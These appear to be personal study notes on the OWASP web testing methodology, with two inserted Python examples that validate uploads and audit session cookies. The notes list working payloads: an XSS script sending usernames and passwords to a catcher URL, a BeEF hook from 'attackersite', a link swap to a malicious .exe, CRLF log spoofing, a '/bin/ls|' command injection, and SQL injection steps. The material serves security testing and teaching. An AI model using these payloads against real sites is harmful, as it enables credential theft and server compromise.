USING THE TESTING GUIDE: go to page 47, look for the control and Ctrl+F the Ref number.

OWASP Testing Methodology:

Before Development:
1. Policy review
2. Standards review

Definition and Design:
1. Requirements review
2. Design and UML models review
3. Architecture review
4. Create and review the threat models

Development:
1. Code walkthroughs
2. Code review
3. Unit and system tests

Maintenance:
1. Change verification
2. Health checks
3. Operational management review
4. Regression tests

Two modes: 1. Passive 2. Active. Under active we have all the tests below. The set of active tests is split into 9 sub-categories for a total of 66 controls:
Configuration Management Testing
Business Logic Testing
Authentication Testing
Authorization Testing
Session Management Testing
Data Validation Testing
Denial of Service Testing
Web Services Testing
Ajax Testing
For the above tests we use specific tools.

Black box testing:
Analyze robots.txt using Google Webmaster Tools.
Use site:____ and intest____ to identify sites and resources.
cache:______ gives the cached version of the site.

Grey box testing:
Analyze entry points.
Look into the POST and GET methods used.
Use Fiddler for analysing the requests.
SQL INJECTION: three types: in-band, out-of-band, inferential.
Steps:
1. Adding a semicolon or single quote
2. If we get a normal 500 server error, that means blind SQL injection is in order
3. Check each field separately
4. Check for comment-out specification
5. Try changing parenthesis specifications
6. Some queries check if only one tuple is returned; for that use LIMIT 1 at the end of the payload
7. Use %20 for all spaces
8. Try using ORDER BY and getting the number of columns
9. Then try UNION ALL
10. For blind use SUBSTRING(text, start, length), ASCII(char) and LENGTH(text)
11. LOAD_FILE to add file contents to the SQL query

XSS:
From the response find the script in use; it'll be JavaScript, ActionScript or VBScript.
Use CAL9000 to find out the type of encoding, like %3cscript%3e.
Script to download a malicious .exe file:
    <script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }
Use for REDIRECTION:
    <script>alert(document.cookie)
    use window.location="www.1.com" window.navigation("");
FOR Phishing use:
    <script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} <br>
Log Spoofing:
    Smith%0d%0aLogin Succeeded for username: admin
XSS browser exploitation framework (BeEF):
    <script src=http://attackersite/beef/hook/beefmagic.js.php>
The HttpOnly attribute on the session cookie adds to the security.

HTTP POST request for file upload:
    POST /fileupload.aspx HTTP/1.1
    []
    Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
    Content-Type: text/plain
    test
HTTP POST request forged:
    Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
    Content-Type: text/html
    <script>alert(document.cookie)
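The forged upload above gets through when the server trusts only the filename. As an added example that is not part of these notes, the following Python checks one multipart part the way a server should: the extension, the declared Content-Type and the file's leading bytes must all agree (the allowlist, boundary and sample bodies are constructed for the example):

```python
# Added example (not from the notes): server-side checks for the forged upload
# shown above. It parses one multipart part and refuses a file whose extension,
# declared Content-Type and leading bytes do not agree. Allowlist is assumed.
import re

# Allowed extension -> (acceptable declared MIME types, required magic prefix)
ALLOWED = {
    ".txt": ({"text/plain"}, None),
    ".gif": ({"image/gif"}, (b"GIF87a", b"GIF89a")),
    ".png": ({"image/png"}, (b"\x89PNG\r\n\x1a\n",)),
}

def parse_part(body: bytes, boundary: bytes):
    """Return (basename, declared content type, data) of the first file part."""
    head, _, rest = body.partition(b"\r\n\r\n")
    data = rest.split(b"\r\n--" + boundary, 1)[0]
    m = re.search(rb'filename="([^"]*)"', head)
    ct = re.search(rb"Content-Type:\s*([^\r\n]+)", head, re.I)
    # Browsers may send the full client path: keep only the basename
    name = re.split(r"[\\/]", m.group(1).decode() if m else "")[-1]
    ctype = ct.group(1).decode().strip().lower() if ct else ""
    return name, ctype, data

def validate_upload(body: bytes, boundary: bytes):
    """Return (ok, reason); reject when extension, MIME and magic disagree."""
    name, ctype, data = parse_part(body, boundary)
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext not in ALLOWED:
        return False, f"extension not allowed: {ext!r}"
    mimes, magic = ALLOWED[ext]
    if ctype not in mimes:
        return False, f"declared type {ctype!r} does not match {ext}"
    if magic and not data.startswith(magic):
        return False, "content does not match extension (magic bytes)"
    if ext == ".txt" and re.search(rb"<\s*script", data, re.I):
        return False, "script markup in text upload"
    return True, "ok"

def build_body(boundary: bytes, filename: str, ctype: str, data: bytes):
    """Constructed multipart body shaped like the two POSTs in the notes."""
    return (b"--" + boundary + b"\r\n"
            b'Content-Disposition: form-data; name="uploadfile1"; filename="'
            + filename.encode() + b'"\r\nContent-Type: ' + ctype.encode()
            + b"\r\n\r\n" + data + b"\r\n--" + boundary + b"--\r\n")

B = b"----boundary"  # constructed boundary
GOOD = build_body(B, r"C:\Documents and Settings\test\Desktop\test.txt", "text/plain", b"test")
FORGED = build_body(B, r"C:\Documents and Settings\test\Desktop\test.gif", "text/html",
                    b"<script>alert(document.cookie)")
```

A real handler would also store the file under a server-generated name outside the web root, so even a file that passes these checks is never served back as HTML.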
Some special variables and functions to look at when analyzing source code:
For PHP:
    $_GET - HTTP GET variables
    $_POST - HTTP POST variables
    $_FILES - HTTP File Upload variables
For ASP:
    Request.QueryString - HTTP GET
    Request.Form - HTTP POST
    Server.CreateObject - used to upload files
For JSP:
    doGet, doPost servlets - HTTP GET and POST
    request.getParameter - HTTP GET/POST variables

SSL testing:
SSL encrypts responses and requests. It also provides digital certificates for authenticating servers and sometimes even clients.
HTTPS can run on non-standard ports.
Nessus can report weak ciphers in SSL.
Check certificates: the domain name might not match the certificate.

Infrastructure and Application Admin Interfaces:
Use DirBuster and get directories.
See source code for links in comments.
Review server config to see the admin user page and server credentials.
Try alternate server ports.
Tamper with the GET and POST requests.

Credentials Brute Forcing: 3 types: dictionary, search, rule-based search.
Brutus can be used to carry out these attacks.
Bypassing authentication:
Direct page request (forced browsing)
Parameter modification
Session ID prediction
SQL injection
Testing for logout:
See if the cache has some info.
See if the session is completely gone.
Try going forward and backward.
Testing for race conditions: concurrency in accounts, concurrency in the cart, etc.
For sessions:
See if sessions are weak.
See for fixation.
See for tags like:
    HttpOnly - keeps the cookie from going out
    Secure - encrypted tunnel for sensitive data
    Domain - same origin policy
    Path
    Expires
Authorization testing:
Path traversal using ..//
Forced browsing
Test for CSRF
Testing for XSS: use CAL9000 for testing character encoding; stored XSS can be exploited further with BeEF.
LDAP injection: check by inserting '(', '|', '&', '*' in the ldapsearch field.
ORM injection: an object-relational mapping tool is used to map DB objects to protect from DOR.
XML injection: test with adding ' " < > to include the content of a file. The injection can also be performed in HTTP headers:
    GET / HTTP/1.0
    Referer:
    User-Agent:
SSI directives: < ! # = / . " - > and [a-zA-Z0-9]
XPath injection: -----
OS command injection:
Example URL before alteration: http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Example URL modified: http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
This will execute the command /bin/ls. Use a semicolon after that for a .php page.
In the POST method as:
    Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
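The session checks above (weak IDs, HttpOnly, Secure, Domain, Path, Expires) are the kind of thing worth automating against every Set-Cookie a login response returns. As an added example that is not part of these notes, the following Python audits one Set-Cookie header; the cookie name, values and URL are constructed samples:

```python
# Added example (not from the notes): audits the session-cookie attributes the
# notes list (HttpOnly, Secure, Domain, Path, Expires) plus a rough check for a
# predictable session ID. Sample headers, cookie name and URL are constructed.
from urllib.parse import urlsplit

def parse_set_cookie(header: str):
    """Split one Set-Cookie value into (name, value, {attr-lowercase: val})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), value.strip(), attrs

def audit_session_cookie(header: str, page_url: str):
    """Return a list of findings (empty list = nothing to report)."""
    name, value, attrs = parse_set_cookie(header)
    host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: cookie readable via document.cookie")
    if "secure" not in attrs:
        findings.append("no Secure: cookie also sent over plain HTTP")
    domain = attrs.get("domain", "").lower().lstrip(".")
    if domain and domain != host:
        # Domain wider than the issuing host: every host under it gets the cookie
        findings.append(f"Domain={domain}: shared with every host under it")
    if "path" not in attrs:
        findings.append("no Path: defaults to the request's directory")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent session cookie: survives browser close")
    if len(value) < 16 or value.isdigit():
        # Short or purely numeric IDs are the easy case for session ID prediction
        findings.append("session ID short or numeric: predictable")
    return findings

# Constructed sample Set-Cookie values: one weak, one hardened
WEAK = "PHPSESSID=12345; Domain=example.com; Expires=Wed, 01 Jan 2031 00:00:00 GMT"
HARD = "PHPSESSID=a3f9c0e71b2d4e6f8a9b0c1d2e3f4a5b; Path=/; Secure; HttpOnly"
URL = "https://app.example.com/login"

if __name__ == "__main__":
    for h in (WEAK, HARD):
        print(h.split(";")[0], "->", audit_session_cookie(h, URL) or ["ok"])
```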